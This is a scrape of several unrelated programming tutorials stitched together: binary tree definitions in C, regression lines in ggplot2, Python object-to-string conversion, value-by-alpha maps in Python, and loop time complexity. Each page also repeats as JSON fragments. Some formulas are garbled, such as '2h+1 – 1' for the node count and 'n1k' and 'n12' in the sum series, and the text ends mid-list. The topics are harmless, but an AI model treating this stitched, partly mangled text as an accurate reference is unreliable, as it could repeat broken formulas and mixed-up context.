A binary tree is defined as a tree in which no node can have more than two children. The highest degree of any node is two. This indicates that the degree of a binary tree is either zero or one or two. In the above fig., the binary tree consists of a root and two sub trees TreeLeft & TreeRight. All nodes to the left of the binary tree are denoted as left subtrees and all nodes to the right of a binary tree are referred to as right subtrees. A binary tree has maximum two children; we can assign direct pointers to them. The declaration of tree nodes is same as in structure to that for doubly linked lists, in that a node is a structure including the key information plus two pointers (left and right) to other nodes. typedef struct tree_node *tree_ptr; struct tree_node { element_type element1; tree_ptr left1; tree_ptr right1; }; typedef tree_ptr TREE; Strictly binary tree Strictly binary tree is defined as a binary tree where all the nodes will have either zero or two children. It does not include one child in any node. Skew tree A skew tree is defined as a binary tree in which every node except the leaf has only one child node. There are two types of skew tree, i.e. left skewed binary tree and right skewed binary tree. Left skewed binary tree A left skew tree has node associated with only the left child. It is a binary tree contains only left subtrees. Right skewed binary tree A right skew tree has node associated with only the right child. It is a binary tree contains only right subtrees. Full binary tree or proper binary tree A binary tree is defined as a full binary tree if all leaves are at the same level and every non leaf node has exactly two children and it should consist of highest possible number of nodes in all levels. A full binary tree of height h has maximum 2h+1 – 1 nodes. Complete binary tree Every non leaf node has exactly two children but all leaves are not necessary to belong at the same level. A complete binary tree is defined as one where all levels have the highest number of nodes except the last level. The last level elements should be filled from left to right direction. Almost complete binary tree An almost complete binary tree is defined as a tree in which each node that has a right child also has a left child. Having a left child does not need a node to have a right child Differences between General Tree and Binary Tree General tree has no limit of number of children. Evaluating any expression is hard in general trees. Binary Tree A binary tree has maximum two children Evaluation of expression is simple in binary tree. Application of trees Manipulation of arithmetic expression Construction of symbol table Analysis of Syntax Writing Grammar Creation of Expression Tree
[ { "code": null, "e": 1264, "s": 1062, "text": "A binary tree is defined as a tree in which no node can have more than two children. The highest degree of any node is two. This indicates that the degree of a binary tree is either zero or one or two." }, { "code": null, "e": 1507, "s": 1264, "text": "In the above fig., the binary tree consists of a root and two sub trees TreeLeft & TreeRight. All nodes to the left of the binary tree are denoted as left subtrees and all nodes to the right of a binary tree are referred to as right subtrees." }, { "code": null, "e": 1784, "s": 1507, "text": "A binary tree has maximum two children; we can assign direct pointers to them. The declaration of tree nodes is same as in structure to that for doubly linked lists, in that a node is a structure including the key information plus two pointers (left and right) to other nodes." }, { "code": null, "e": 1927, "s": 1784, "text": "typedef struct tree_node *tree_ptr;\nstruct tree_node\n{\n element_type element1;\n tree_ptr left1; tree_ptr right1;\n};\ntypedef tree_ptr TREE;" }, { "code": null, "e": 1948, "s": 1927, "text": "Strictly binary tree" }, { "code": null, "e": 2099, "s": 1948, "text": "Strictly binary tree is defined as a binary tree where all the nodes will have either zero or two children. It does not include one child in any node." }, { "code": null, "e": 2109, "s": 2099, "text": "Skew tree" }, { "code": null, "e": 2303, "s": 2109, "text": "A skew tree is defined as a binary tree in which every node except the leaf has only one child node. There are two types of skew tree, i.e. left skewed binary tree and right skewed binary tree." }, { "code": null, "e": 2327, "s": 2303, "text": "Left skewed binary tree" }, { "code": null, "e": 2439, "s": 2327, "text": "A left skew tree has node associated with only the left child. It is a binary tree contains only left subtrees." }, { "code": null, "e": 2464, "s": 2439, "text": "Right skewed binary tree" }, { "code": null, "e": 2579, "s": 2464, "text": "A right skew tree has node associated with only the right child. It is a binary tree contains only right subtrees." }, { "code": null, "e": 2618, "s": 2579, "text": "Full binary tree or proper binary tree" }, { "code": null, "e": 2882, "s": 2618, "text": "A binary tree is defined as a full binary tree if all leaves are at the same level and every non leaf node has exactly two children and it should consist of highest possible number of nodes in all levels. A full binary tree of height h has maximum 2h+1 – 1 nodes." }, { "code": null, "e": 2904, "s": 2882, "text": " Complete binary tree" }, { "code": null, "e": 3196, "s": 2904, "text": "Every non leaf node has exactly two children but all leaves are not necessary to belong at the same level. A complete binary tree is defined as one where all levels have the highest number of nodes except the last level. The last level elements should be filled from left to right direction." }, { "code": null, "e": 3225, "s": 3196, "text": " Almost complete binary tree" }, { "code": null, "e": 3405, "s": 3225, "text": "An almost complete binary tree is defined as a tree in which each node that has a right child also has a left child. Having a left child does not need a node to have a right child" }, { "code": null, "e": 3454, "s": 3405, "text": "Differences between General Tree and Binary Tree" }, { "code": null, "e": 3503, "s": 3454, "text": "General tree has no limit of number of children." }, { "code": null, "e": 3555, "s": 3503, "text": "Evaluating any expression is hard in general trees." }, { "code": null, "e": 3567, "s": 3555, "text": "Binary Tree" }, { "code": null, "e": 3606, "s": 3567, "text": "A binary tree has maximum two children" }, { "code": null, "e": 3657, "s": 3606, "text": "Evaluation of expression is simple in binary tree." }, { "code": null, "e": 3678, "s": 3657, "text": "Application of trees" }, { "code": null, "e": 3716, "s": 3678, "text": "Manipulation of arithmetic expression" }, { "code": null, "e": 3745, "s": 3716, "text": "Construction of symbol table" }, { "code": null, "e": 3764, "s": 3745, "text": "Analysis of Syntax" }, { "code": null, "e": 3780, "s": 3764, "text": "Writing Grammar" }, { "code": null, "e": 3808, "s": 3780, "text": "Creation of Expression Tree" } ]
Add Regression Line to ggplot2 Plot in R - GeeksforGeeks
28 Apr, 2021 Regression models a target prediction value based on independent variables. It is mostly used for finding out the relationship between variables and forecasting. Different regression models differ based on – the kind of relationship between dependent and independent variables, they are considering and the number of independent variables being used. The best way of understanding things is to visualize, we can visualize regression by plotting regression lines in our dataset. In most cases, we use a scatter plot to represent our dataset and draw a regression line to visualize how regression is working. Approach: In R Programming Language it is easy to visualize things. The approach towards plotting the regression line includes the following steps:- Create the dataset to plot the data points Use the ggplot2 library to plot the data points using the ggplot() function Use geom_point() function to plot the dataset in a scatter plot Use any of the smoothening functions to draw a regression line over the dataset which includes the usage of lm() function to calculate intercept and slope of the line. Various smoothening functions are show below. Method 1: Using stat_smooth() In R we can use the stat_smooth() function to smoothen the visualization. Syntax: stat_smooth(method=”method_name”, formula=fromula_to_be_used, geom=’method name’) Parameters: method: It is the smoothing method (function) to use for smoothing the line formula: It is the formula to use in the smoothing function geom: It is the geometric object to use display the data In order to show regression line on the graphical medium with help of stat_smooth() function, we pass a method as “lm”, the formula used as y ~ x. and geom as ‘smooth’ R # Create example datarm(list = ls())set.seed(87) x <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) # Print first rows of datahead(data) # Install & load ggplot2 library("ggplot2") # Create basic ggplot# and Add regression lineggp <- ggplot(data, aes(x, y)) + geom_point()ggpggp + stat_smooth(method = "lm", formula = y ~ x, geom = "smooth") Output: Method 2: Using geom_smooth() In R we can use the geom_smooth() function to represent a regression line and smoothen the visualization. Syntax: geom_smooth(method=”method_name”, formula=fromula_to_be_used) Parameters: method: It is the smoothing method (function) to use for smoothing the line formula: It is the formula to use in the smoothing function In this example, we are using the Boston dataset that contains data on housing prices from a package named MASS. In order to show the regression line on the graphical medium with help of geom_smooth() function, we pass the method as “loess” and the formula used as y ~ x. R # importing essential librarieslibrary(dplyr) # Load the datadata("Boston", package = "MASS") # Split the data into training and test settraining.samples <- Boston$medv %>% createDataPartition(p = 0.85, list = FALSE) #Create train and test datatrain.data <- Boston[training.samples, ]test.data <- Boston[-training.samples, ] # plotting the dataggp<-ggplot(train.data, aes(lstat, medv) ) + geom_point() # adding the regression line to itggp+geom_smooth(method = "loess", formula = y ~ x) Output: Method 3: Using geom_abline() We can create the regression line using geom_abline() function. It uses the coefficient and intercepts which are calculated by applying the linear regression using lm() function. Syntax: geom_abline(intercept, slope, linetype, color, size) Parameters: intercept: The calculated y intercept of the line to be drawn slope: Slope of the line to be drawn linetype: Specifies the type of the line to be drawn color: Color of the lone to be drawn size: Indicates the size of the line The intercept and slope can be easily calculated by the lm() function which is used for linear regression followed by coefficients(). R rm(list = ls()) # Install & load ggplot2library("ggplot2") set.seed(87) # Create example datax <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) reg<-lm(formula = y ~ x, data=data) #get intercept and slope valuecoeff<-coefficients(reg) intercept<-coeff[1]slope<- coeff[2] # Create basic ggplotggp <- ggplot(data, aes(x, y)) + geom_point() # add the regression lineggp+geom_abline(intercept = intercept, slope = slope, color="red", linetype="dashed", size=1.5)+ ggtitle("geeksforgeeks") Output: Picked R-ggplot R Language Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Group by function in R using Dplyr Change Color of Bars in Barchart using ggplot2 in R How to Split Column Into Multiple Columns in R DataFrame? How to Change Axis Scales in R Plots? Replace Specific Characters in String in R How to filter R DataFrame by values in a column? Time Series Analysis in R How to filter R dataframe by multiple conditions? Logistic Regression in R Programming R - if statement
[ { "code": null, "e": 25340, "s": 25312, "text": "\n28 Apr, 2021" }, { "code": null, "e": 25691, "s": 25340, "text": "Regression models a target prediction value based on independent variables. It is mostly used for finding out the relationship between variables and forecasting. Different regression models differ based on – the kind of relationship between dependent and independent variables, they are considering and the number of independent variables being used." }, { "code": null, "e": 25947, "s": 25691, "text": "The best way of understanding things is to visualize, we can visualize regression by plotting regression lines in our dataset. In most cases, we use a scatter plot to represent our dataset and draw a regression line to visualize how regression is working." }, { "code": null, "e": 25957, "s": 25947, "text": "Approach:" }, { "code": null, "e": 26096, "s": 25957, "text": "In R Programming Language it is easy to visualize things. The approach towards plotting the regression line includes the following steps:-" }, { "code": null, "e": 26139, "s": 26096, "text": "Create the dataset to plot the data points" }, { "code": null, "e": 26215, "s": 26139, "text": "Use the ggplot2 library to plot the data points using the ggplot() function" }, { "code": null, "e": 26279, "s": 26215, "text": "Use geom_point() function to plot the dataset in a scatter plot" }, { "code": null, "e": 26493, "s": 26279, "text": "Use any of the smoothening functions to draw a regression line over the dataset which includes the usage of lm() function to calculate intercept and slope of the line. Various smoothening functions are show below." }, { "code": null, "e": 26523, "s": 26493, "text": "Method 1: Using stat_smooth()" }, { "code": null, "e": 26597, "s": 26523, "text": "In R we can use the stat_smooth() function to smoothen the visualization." }, { "code": null, "e": 26687, "s": 26597, "text": "Syntax: stat_smooth(method=”method_name”, formula=fromula_to_be_used, geom=’method name’)" }, { "code": null, "e": 26700, "s": 26687, "text": "Parameters: " }, { "code": null, "e": 26776, "s": 26700, "text": "method: It is the smoothing method (function) to use for smoothing the line" }, { "code": null, "e": 26836, "s": 26776, "text": "formula: It is the formula to use in the smoothing function" }, { "code": null, "e": 26893, "s": 26836, "text": "geom: It is the geometric object to use display the data" }, { "code": null, "e": 27061, "s": 26893, "text": "In order to show regression line on the graphical medium with help of stat_smooth() function, we pass a method as “lm”, the formula used as y ~ x. and geom as ‘smooth’" }, { "code": null, "e": 27063, "s": 27061, "text": "R" }, { "code": "# Create example datarm(list = ls())set.seed(87) x <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) # Print first rows of datahead(data) # Install & load ggplot2 library(\"ggplot2\") # Create basic ggplot# and Add regression lineggp <- ggplot(data, aes(x, y)) + geom_point()ggpggp + stat_smooth(method = \"lm\", formula = y ~ x, geom = \"smooth\")", "e": 27573, "s": 27063, "text": null }, { "code": null, "e": 27581, "s": 27573, "text": "Output:" }, { "code": null, "e": 27611, "s": 27581, "text": "Method 2: Using geom_smooth()" }, { "code": null, "e": 27718, "s": 27611, "text": "In R we can use the geom_smooth() function to represent a regression line and smoothen the visualization. " }, { "code": null, "e": 27788, "s": 27718, "text": "Syntax: geom_smooth(method=”method_name”, formula=fromula_to_be_used)" }, { "code": null, "e": 27800, "s": 27788, "text": "Parameters:" }, { "code": null, "e": 27876, "s": 27800, "text": "method: It is the smoothing method (function) to use for smoothing the line" }, { "code": null, "e": 27936, "s": 27876, "text": "formula: It is the formula to use in the smoothing function" }, { "code": null, "e": 28208, "s": 27936, "text": "In this example, we are using the Boston dataset that contains data on housing prices from a package named MASS. In order to show the regression line on the graphical medium with help of geom_smooth() function, we pass the method as “loess” and the formula used as y ~ x." }, { "code": null, "e": 28210, "s": 28208, "text": "R" }, { "code": "# importing essential librarieslibrary(dplyr) # Load the datadata(\"Boston\", package = \"MASS\") # Split the data into training and test settraining.samples <- Boston$medv %>% createDataPartition(p = 0.85, list = FALSE) #Create train and test datatrain.data <- Boston[training.samples, ]test.data <- Boston[-training.samples, ] # plotting the dataggp<-ggplot(train.data, aes(lstat, medv) ) + geom_point() # adding the regression line to itggp+geom_smooth(method = \"loess\", formula = y ~ x)", "e": 28719, "s": 28210, "text": null }, { "code": null, "e": 28727, "s": 28719, "text": "Output:" }, { "code": null, "e": 28757, "s": 28727, "text": "Method 3: Using geom_abline()" }, { "code": null, "e": 28936, "s": 28757, "text": "We can create the regression line using geom_abline() function. It uses the coefficient and intercepts which are calculated by applying the linear regression using lm() function." }, { "code": null, "e": 28997, "s": 28936, "text": "Syntax: geom_abline(intercept, slope, linetype, color, size)" }, { "code": null, "e": 29009, "s": 28997, "text": "Parameters:" }, { "code": null, "e": 29071, "s": 29009, "text": "intercept: The calculated y intercept of the line to be drawn" }, { "code": null, "e": 29108, "s": 29071, "text": "slope: Slope of the line to be drawn" }, { "code": null, "e": 29162, "s": 29108, "text": "linetype: Specifies the type of the line to be drawn " }, { "code": null, "e": 29199, "s": 29162, "text": "color: Color of the lone to be drawn" }, { "code": null, "e": 29236, "s": 29199, "text": "size: Indicates the size of the line" }, { "code": null, "e": 29371, "s": 29236, "text": "The intercept and slope can be easily calculated by the lm() function which is used for linear regression followed by coefficients(). " }, { "code": null, "e": 29373, "s": 29371, "text": "R" }, { "code": "rm(list = ls()) # Install & load ggplot2library(\"ggplot2\") set.seed(87) # Create example datax <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) reg<-lm(formula = y ~ x, data=data) #get intercept and slope valuecoeff<-coefficients(reg) intercept<-coeff[1]slope<- coeff[2] # Create basic ggplotggp <- ggplot(data, aes(x, y)) + geom_point() # add the regression lineggp+geom_abline(intercept = intercept, slope = slope, color=\"red\", linetype=\"dashed\", size=1.5)+ ggtitle(\"geeksforgeeks\") ", "e": 29941, "s": 29373, "text": null }, { "code": null, "e": 29949, "s": 29941, "text": "Output:" }, { "code": null, "e": 29956, "s": 29949, "text": "Picked" }, { "code": null, "e": 29965, "s": 29956, "text": "R-ggplot" }, { "code": null, "e": 29976, "s": 29965, "text": "R Language" }, { "code": null, "e": 30074, "s": 29976, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30109, "s": 30074, "text": "Group by function in R using Dplyr" }, { "code": null, "e": 30161, "s": 30109, "text": "Change Color of Bars in Barchart using ggplot2 in R" }, { "code": null, "e": 30219, "s": 30161, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 30257, "s": 30219, "text": "How to Change Axis Scales in R Plots?" }, { "code": null, "e": 30300, "s": 30257, "text": "Replace Specific Characters in String in R" }, { "code": null, "e": 30349, "s": 30300, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 30375, "s": 30349, "text": "Time Series Analysis in R" }, { "code": null, "e": 30425, "s": 30375, "text": "How to filter R dataframe by multiple conditions?" }, { "code": null, "e": 30462, "s": 30425, "text": "Logistic Regression in R Programming" } ]
Convert Object to String in Python - GeeksforGeeks
28 Jul, 2020 Python defines type conversion functions to directly convert one data type to another. This article is aimed at providing information about converting an object to a string. Everything is an object in Python. So all the built-in objects can be converted to strings using the str() and repr() methods. Example 1: Using str() method Python3 # object of intInt = 6 # object of floatFloat = 6.0 # Converting to strings1 = str(Int)print(s1)print(type(s1)) s2= str(Float)print(s2)print(type(s2)) Output: 6 <class 'str'> 6.0 <class 'str'> Example 2: Use repr() to convert an object to a string Python3 print(repr({"a": 1, "b": 2}))print(repr([1, 2, 3])) # Custom classclass C(): def __repr__(self): return "This is class C" # Converting custom object to # stringprint(repr(C())) Output: {'a': 1, 'b': 2} [1, 2, 3] This is class C Note: To know more about str() and repr() and the difference between to refer, str() vs repr() in Python python-string Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Python Dictionary Read a file line by line in Python Enumerate() in Python Iterate over a list in Python How to Install PIP on Windows ? Different ways to create Pandas Dataframe Create a Pandas DataFrame from Lists Python program to convert a list to string Reading and Writing to text files in Python sum() function in Python
[ { "code": null, "e": 24866, "s": 24838, "text": "\n28 Jul, 2020" }, { "code": null, "e": 25040, "s": 24866, "text": "Python defines type conversion functions to directly convert one data type to another. This article is aimed at providing information about converting an object to a string." }, { "code": null, "e": 25167, "s": 25040, "text": "Everything is an object in Python. So all the built-in objects can be converted to strings using the str() and repr() methods." }, { "code": null, "e": 25197, "s": 25167, "text": "Example 1: Using str() method" }, { "code": null, "e": 25205, "s": 25197, "text": "Python3" }, { "code": "# object of intInt = 6 # object of floatFloat = 6.0 # Converting to strings1 = str(Int)print(s1)print(type(s1)) s2= str(Float)print(s2)print(type(s2))", "e": 25359, "s": 25205, "text": null }, { "code": null, "e": 25367, "s": 25359, "text": "Output:" }, { "code": null, "e": 25401, "s": 25367, "text": "6\n<class 'str'>\n6.0\n<class 'str'>" }, { "code": null, "e": 25456, "s": 25401, "text": "Example 2: Use repr() to convert an object to a string" }, { "code": null, "e": 25464, "s": 25456, "text": "Python3" }, { "code": "print(repr({\"a\": 1, \"b\": 2}))print(repr([1, 2, 3])) # Custom classclass C(): def __repr__(self): return \"This is class C\" # Converting custom object to # stringprint(repr(C()))", "e": 25653, "s": 25464, "text": null }, { "code": null, "e": 25661, "s": 25653, "text": "Output:" }, { "code": null, "e": 25704, "s": 25661, "text": "{'a': 1, 'b': 2}\n[1, 2, 3]\nThis is class C" }, { "code": null, "e": 25809, "s": 25704, "text": "Note: To know more about str() and repr() and the difference between to refer, str() vs repr() in Python" }, { "code": null, "e": 25823, "s": 25809, "text": "python-string" }, { "code": null, "e": 25830, "s": 25823, "text": "Python" }, { "code": null, "e": 25928, "s": 25830, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25937, "s": 25928, "text": "Comments" }, { "code": null, "e": 25950, "s": 25937, "text": "Old Comments" }, { "code": null, "e": 25968, "s": 25950, "text": "Python Dictionary" }, { "code": null, "e": 26003, "s": 25968, "text": "Read a file line by line in Python" }, { "code": null, "e": 26025, "s": 26003, "text": "Enumerate() in Python" }, { "code": null, "e": 26055, "s": 26025, "text": "Iterate over a list in Python" }, { "code": null, "e": 26087, "s": 26055, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 26129, "s": 26087, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 26166, "s": 26129, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 26209, "s": 26166, "text": "Python program to convert a list to string" }, { "code": null, "e": 26253, "s": 26209, "text": "Reading and Writing to text files in Python" } ]
How to make Value-By-Alpha Maps in Python | by Abdishakur | Towards Data Science
Ever since I have seen the beautiful aesthetics of Value-By-Alpha maps, I wanted to make one. It was not that hard to make them with a bit of hacking in QGIS or ArcGIS back then. Now, you can make your value-by-alpha map with Python thanks to Pysal library and Splot. In this tutorial, I will guide you on how to make value-by-alpha map using Python. But first, let us understand what value-by-alpha map is, why use it, and when is it appropriate to use? Value-by-alpha is bivariate choropleth technique where we consider two variables that affect each other say, for example, election results and population density. The second variable acts as an equalizer for the other variable of interest. VBA modifies therefore through the alpha variable (transparency) the background colour. Thus, lower values fade into the background, while higher values pop up. The VBA maps came into existence to reduce the larger size bias in choropleth maps. Besides the aesthetics part, VBA can be a good fit when you want to highlight spotlights through colour instead of size, using choropleth techniques. It does portray much better information than the pure choropleth map. However, you first need to have a variable which is consequential to the variable of interest ( I,e. counties with more voters have consequential effects on election results). We will be using the Splot Python library to create our map and Geopandas to read the Geospatial data. We use a subset data of 2012 elections in the USA. Let us first read the data and look at the first few rows. import geopandas as gpdfrom splot.mapping import vba_choroplethimport matplotlib.pyplot as plt%matplotlib inlinegdf = gpd.read_file("data/MN_elections_2012.gpkg")gdf.head() As you can see from the table below, we have a Geodataframe with different columns. For example, Barack OBA column holds the results in the area. We use choropleth maps most of the time, but as we have mentioned in the preceding section, It has its limitations. Let us first make a choropleth map out of the data to create a benchmark for the data visualization. We can pick, for example, to use Barack Obama column. fig, ax = plt.subplots(figsize=(12,10))gdf.plot(column=’BARACK OBA’, scheme=’quantiles’, cmap=’RdBu’, ax=ax)ax.axis(“off”)plt.show() Now, we create a value-by-alpha map. To create our map, we need two columns. The first column is what we are interested in displaying in the map; for example, Barack Obama results. The second column holds the alpha values to equalize. This alpha equalization will eliminate low values from the map appearance and increases the spotlight effects in areas with high values. We can choose the total results as the alpha values. fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show() The value by alpha map highlights the high-value areas immediately, even if they are n. Compared to the choropleth map, which the large areas dominate the visual, the value-by-alpha map shows clearly the high-value areas. We can simply use a black background to emphasize the spotlight effect as well. Compare the below value-by-alpha map with the one above. plt.style.use('dark_background')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show() Without a legend, the value-by-alpha maps are hard to read. Splot provides an easy way to create a Legend, way easier than even other heavyweight GIS software applications. We also revert back to a white background. plt.style.use('default')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )plt.show() Finally, we can add some context to the map. For example, we can add major cities to help the reader effectively read the map. cities = gpd.read_file(“data/ne_10_populated_places.geojson”)cities = cities.to_crs(“EPSG:26915”)fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )cities.plot(ax=ax, color = "white")for x, y, label in zip(cities.geometry.x, cities.geometry.y, cities.NAME): ax.annotate(label, xy=(x, y), xytext=(3, 3), textcoords="offset points")plt.show() Now, we have an aesthetically pleasing map that helps us to convey the spotlight effect without the limitations of choropleth maps. Value-by-alpha maps are an effective way to visualize geospatial data, avoiding the limitations of both choropleth and cartogram maps. In this tutorial, we have explored what value-by-alpha map is and how to create one using the Splot library. The code for this tutorial is available at this Github repository.
[ { "code": null, "e": 440, "s": 172, "text": "Ever since I have seen the beautiful aesthetics of Value-By-Alpha maps, I wanted to make one. It was not that hard to make them with a bit of hacking in QGIS or ArcGIS back then. Now, you can make your value-by-alpha map with Python thanks to Pysal library and Splot." }, { "code": null, "e": 627, "s": 440, "text": "In this tutorial, I will guide you on how to make value-by-alpha map using Python. But first, let us understand what value-by-alpha map is, why use it, and when is it appropriate to use?" }, { "code": null, "e": 867, "s": 627, "text": "Value-by-alpha is bivariate choropleth technique where we consider two variables that affect each other say, for example, election results and population density. The second variable acts as an equalizer for the other variable of interest." }, { "code": null, "e": 1112, "s": 867, "text": "VBA modifies therefore through the alpha variable (transparency) the background colour. Thus, lower values fade into the background, while higher values pop up. The VBA maps came into existence to reduce the larger size bias in choropleth maps." }, { "code": null, "e": 1332, "s": 1112, "text": "Besides the aesthetics part, VBA can be a good fit when you want to highlight spotlights through colour instead of size, using choropleth techniques. It does portray much better information than the pure choropleth map." }, { "code": null, "e": 1508, "s": 1332, "text": "However, you first need to have a variable which is consequential to the variable of interest ( I,e. counties with more voters have consequential effects on election results)." }, { "code": null, "e": 1721, "s": 1508, "text": "We will be using the Splot Python library to create our map and Geopandas to read the Geospatial data. We use a subset data of 2012 elections in the USA. Let us first read the data and look at the first few rows." }, { "code": null, "e": 1894, "s": 1721, "text": "import geopandas as gpdfrom splot.mapping import vba_choroplethimport matplotlib.pyplot as plt%matplotlib inlinegdf = gpd.read_file(\"data/MN_elections_2012.gpkg\")gdf.head()" }, { "code": null, "e": 2040, "s": 1894, "text": "As you can see from the table below, we have a Geodataframe with different columns. For example, Barack OBA column holds the results in the area." }, { "code": null, "e": 2311, "s": 2040, "text": "We use choropleth maps most of the time, but as we have mentioned in the preceding section, It has its limitations. Let us first make a choropleth map out of the data to create a benchmark for the data visualization. We can pick, for example, to use Barack Obama column." }, { "code": null, "e": 2444, "s": 2311, "text": "fig, ax = plt.subplots(figsize=(12,10))gdf.plot(column=’BARACK OBA’, scheme=’quantiles’, cmap=’RdBu’, ax=ax)ax.axis(“off”)plt.show()" }, { "code": null, "e": 2869, "s": 2444, "text": "Now, we create a value-by-alpha map. To create our map, we need two columns. The first column is what we are interested in displaying in the map; for example, Barack Obama results. The second column holds the alpha values to equalize. This alpha equalization will eliminate low values from the map appearance and increases the spotlight effects in areas with high values. We can choose the total results as the alpha values." }, { "code": null, "e": 3162, "s": 2869, "text": "fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show()" }, { "code": null, "e": 3384, "s": 3162, "text": "The value by alpha map highlights the high-value areas immediately, even if they are n. Compared to the choropleth map, which the large areas dominate the visual, the value-by-alpha map shows clearly the high-value areas." }, { "code": null, "e": 3521, "s": 3384, "text": "We can simply use a black background to emphasize the spotlight effect as well. Compare the below value-by-alpha map with the one above." }, { "code": null, "e": 3846, "s": 3521, "text": "plt.style.use('dark_background')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False )plt.show()" }, { "code": null, "e": 4062, "s": 3846, "text": "Without a legend, the value-by-alpha maps are hard to read. Splot provides an easy way to create a Legend, way easier than even other heavyweight GIS software applications. We also revert back to a white background." }, { "code": null, "e": 4398, "s": 4062, "text": "plt.style.use('default')fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )plt.show()" }, { "code": null, "e": 4525, "s": 4398, "text": "Finally, we can add some context to the map. For example, we can add major cities to help the reader effectively read the map." }, { "code": null, "e": 5119, "s": 4525, "text": "cities = gpd.read_file(“data/ne_10_populated_places.geojson”)cities = cities.to_crs(“EPSG:26915”)fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf[‘BARACK OBA’].values, gdf[‘Total Resu’].values, gdf, rgb_mapclassify=dict(classifier=’quantiles’), alpha_mapclassify=dict(classifier=’quantiles’), cmap=’RdBu’, ax=ax, revert_alpha=False, legend = True )cities.plot(ax=ax, color = \"white\")for x, y, label in zip(cities.geometry.x, cities.geometry.y, cities.NAME): ax.annotate(label, xy=(x, y), xytext=(3, 3), textcoords=\"offset points\")plt.show()" }, { "code": null, "e": 5251, "s": 5119, "text": "Now, we have an aesthetically pleasing map that helps us to convey the spotlight effect without the limitations of choropleth maps." }, { "code": null, "e": 5495, "s": 5251, "text": "Value-by-alpha maps are an effective way to visualize geospatial data, avoiding the limitations of both choropleth and cartogram maps. In this tutorial, we have explored what value-by-alpha map is and how to create one using the Splot library." } ]
Time Complexity of Loop with Powers - GeeksforGeeks
30 Dec, 2021 What is the time complexity of the below function? C++ C Java Python3 C# Javascript void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616 def fun(n, k): for i in range(1, n + 1): p = pow(i, k) for j in range(1, p + 1): # Some O(1) work # This code is contributed by Shubham Singh static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.Pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616 <script> // JavaScript program for the above approachfunction fun(n, k){ for(let i = 1; i <= n; i++) { int p = Math.pow(i, k); for (let j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh </script> Time complexity of above function can be written as 1k + 2k + 3k + ... n1k. Let us try few examples: k=1 Sum = 1 + 2 + 3 ... n = n(n+1)/2 = n2/2 + n/2 k=2 Sum = 12 + 22 + 32 + ... n12. = n(n+1)(2n+1)/6 = n3/3 + n2/2 + n/6 k=3 Sum = 13 + 23 + 33 + ... n13. = n2(n+1)2/4 = n4/4 + n3/2 + n2/4 In general, asymptotic value can be written as (nk+1)/(k+1) + Θ(nk)If n>=k then the time complexity will be considered in O((nk+1)/(k+1)) and if n<k, then the time complexity will be considered as in the O(nk) Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above biplab_prasad rohitnandi01234 umadevi9616 SHUBHAMSINGH10 time complexity Analysis Articles Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Understanding Time Complexity with Simple Examples Time Complexity and Space Complexity Complexity of different operations in Binary tree, Binary Search Tree and AVL tree Analysis of Algorithms | Big-O analysis Analysis of different sorting techniques Tree Traversals (Inorder, 